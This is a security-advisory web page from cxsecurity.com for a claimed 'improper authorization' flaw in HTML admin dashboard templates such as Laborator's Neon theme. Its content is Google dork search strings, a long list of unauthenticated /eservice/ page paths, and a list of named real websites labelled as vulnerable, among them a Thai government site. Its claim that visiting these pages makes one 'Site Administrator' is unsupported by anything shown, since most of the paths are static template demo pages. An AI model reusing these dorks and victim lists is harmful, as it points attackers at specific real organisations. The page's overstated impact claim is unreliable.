WordPress © 2015 Neon Admin Theme by Laborator.co Improper Authorization Vulnerability

2018.10.31
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

################################################################################################# # Exploit Title : WordPress © 2015 Neon Admin Theme by Laborator.co Improper Authorization Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 01/11/2018 # Vendor Homepage : laborator.co # Tested On : Windows and Linux # Category : WebApps # Software Download Link [ Similar ] : github.com/sbilly/joli-admin/tree/master/joli # Google Dorks : intext:''© 2015 Neon Admin Theme by Laborator'' intext:''© 2014 Xenon theme by Laborator'' intext:''Copyright © 2017 PixelAdmin LLC.'' intext:''© 2016 KAIJUTHEMES'' intext:''2014 © μAdmin - Responsive Multi-Style Admin Template'' intext:''© 2016 WebAdmin - All Rights Reserved.'' intext:''Open source community - Collect from AIOS'' intext:''2016 © Minton.'' intext:''© 2017 Your Company'' # Exploit Risk : Medium # CWE : CWE-287- [ Improper Authentication ] - CWE-284 - [ Improper Access Control ] - CWE-285 - [ Improper Authorization ] + CWE-269 - [ Improper Privilege Management ] ################################################################################################# # Admin Panel Login Path : /eservice/ No Admin Username. No Admin Password. Ok. Successfull. Now, you are the Site Administrator. By every targetsite, admin panel path changes. For WordPress Panel Path : /wp-login.php # Exploits : /eservice/dashboard-2.html /eservice/dashboard-3.html /eservice/mailbox.html /eservice/extra-calendar.html /eservice/skin-black.html /eservice/skin-white.html /eservice/skin-purple.html /eservice/skin-cafe.html /eservice/skin-red.html /eservice/skin-green.html /eservice/skin-yellow.html /eservice/skin-blue.html /eservice/skin-facebook.html /eservice/highlights.html /eservice/layout-api.html /eservice/layout-api-right-sidebar.html /eservice/layout-collapsed-sidebar.html /eservice/layout-fixed-sidebar.html /eservice/layout-chat-open.html /eservice/layout-horizontal-menu-boxed.html /eservice/layout-horizontal-menu-fluid.html /eservice/layout-mixed-menus.html /eservice/layout-right-sidebar.html /eservice/layout-both-menus-right-sidebar.html /eservice/layout-page-transition-fade.html /eservice/layout-page-transition-left-in.html /eservice/layout-page-transition-right-in.html /eservice/layout-page-transition-fade-only.html /eservice/layout-boxed.html /eservice/ui-panels.html /eservice/ui-tiles.html /eservice/forms-buttons.html /eservice/ui-typography.html /eservice/ui-tabs-accordions.html /eservice/ui-tooltips-popovers.html /eservice/ui-navbars.html /eservice/ui-breadcrumbs.html /eservice/ui-badges-labels.html /eservice/ui-progress-bars.html /eservice/ui-modals.html /eservice/ui-blockquotes.html /eservice/ui-alerts.html /eservice/ui-pagination.html /eservice/mailbox.html /eservice/mailbox-compose.html /eservice/mailbox-message.html /eservice/forms-main.html /eservice/forms-advanced.html /eservice/forms-wizard.html /eservice/forms-validation.html /eservice/forms-masks.html /eservice/forms-sliders.html /eservice/forms-file-upload.html /eservice/forms-wysiwyg.html /eservice/tables-main.html /eservice/tables-datatable.html /eservice/extra-icons.html /eservice/extra-icons-entypo.html /eservice/extra-icons-glyphicons.html /eservice/extra-portlets.html /eservice/extra-google-maps.html /eservice/extra-vector-maps.html /eservice/extra-chat-api.html /eservice/extra-calendar.html /eservice/extra-calendar-2.html /eservice/extra-notes.html /eservice/extra-lockscreen.html /eservice/extra-register.html /eservice/extra-invoice.html /eservice/extra-gallery.html /eservice/extra-gallery-single.html /eservice/extra-members.html /eservice/extra-profile.html /eservice/extra-404.html /eservice/extra-blank-page.html /eservice/extra-timeline.html /eservice/extra-comments.html /eservice/extra-timeline-centered.html /eservice/extra-tocify.html /eservice/ui-notifications.html /eservice/extra-new-post.html /eservice/extra-settings.html /eservice/extra-scrollbox.html /eservice/extra-image-crop.html /eservice/extra-search.html /eservice/extra-language-selector.html /eservice/extra-nestable.html /eservice/extra-file-tree.html /eservice/extra-load-progress.html /eservice/charts.html ################################################################################################# # Example Vulnerable Sites => amnat-ed.go.th/eservice/dashboard-3.html => [ Proof of Concept ] => archive.is/Uhwyr # Example Admin Panel Login Path : ict.amnat-ed.go.th/wp-login.php spitalpharmazie-basel.ch/aml/extra-members.html infinite-woodland-5276.herokuapp.com/ui-panels.html foxythemes.net/preview/products/beagle/form-upload.html idete.com.br/scripts/ui-panels.html themeon.net/nifty/v2.9.1/ui-panels.html colourcode.procoders.site/ui-panels.html options-admin.themesease.com/ui-panels.html jaybabani.com/ultra-admin-html/preview/ui-panels.html uxpowered.com/products/pixeladmin/v232/html_demo/ui-panels.html authenticgoods.co/wrapbootstrap/themes/spacelab_v1.4/ui-panels.html portal.sitesonar.net/ui-panels.html thinn.co.za/app/ui-panels.html geekman.site/emphasize/ui/panels.html swlabs.co/madmin_v1.1/code/style3/ui-panels.html themesdesign.in/webadmin_1.1/layouts/red/ui-panels.html dixminutes.wseils-dev.com/fileadmin/WB0048JF7/demo/ui-panels.html tcode.me/uploads/demo/demo104/MAdmin/ui-panels.html ui-worx.com.preview.services/Roxino/ui-panels.html 4afterworkdev.com/ui-panels.html theme.zy62.com/ui-panels.html geedmo.com/themes/naut/v1.4/html5jquery/dist/ui.panels.html tumblr.teamon.eu/minton/Admin/blue_hori/ui-panels.html ui92.com/demo/html/430/ui-panels.html swlabs.co/madmin_v1.1/code/style3/ui-panels.html coderthemes.com/zircos/default-boxed/ui-panels.html demo8.chrisansgroup.com/fanatig/dashboard_customer/1/dashboard/big-bang-studio.com/cosmos/ui-panels.html mglcloud.cn/ui-panels.html fxbitlab.com/template/template10/ui-panels.html themifycloud.com/demos/templates/joli/ui-panels.html demo.thedevelovers.com/dashboard/klorofilpro-v1.6/html/ui-panels.html ressources.kilkoa.com/PixelAdmin-1.3.0/html/ui-panels.html aqvatarius.com/themes/atlant/html/ui-panels.html shop.moonflyer.net/ui-panels.html kuitao8.com/demo/20170225/20170225100041255/ui-panels.html themeon.net/nifty/v2.8/ui-panels.html hmelius.com/ad_outline/ui-panels.html ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top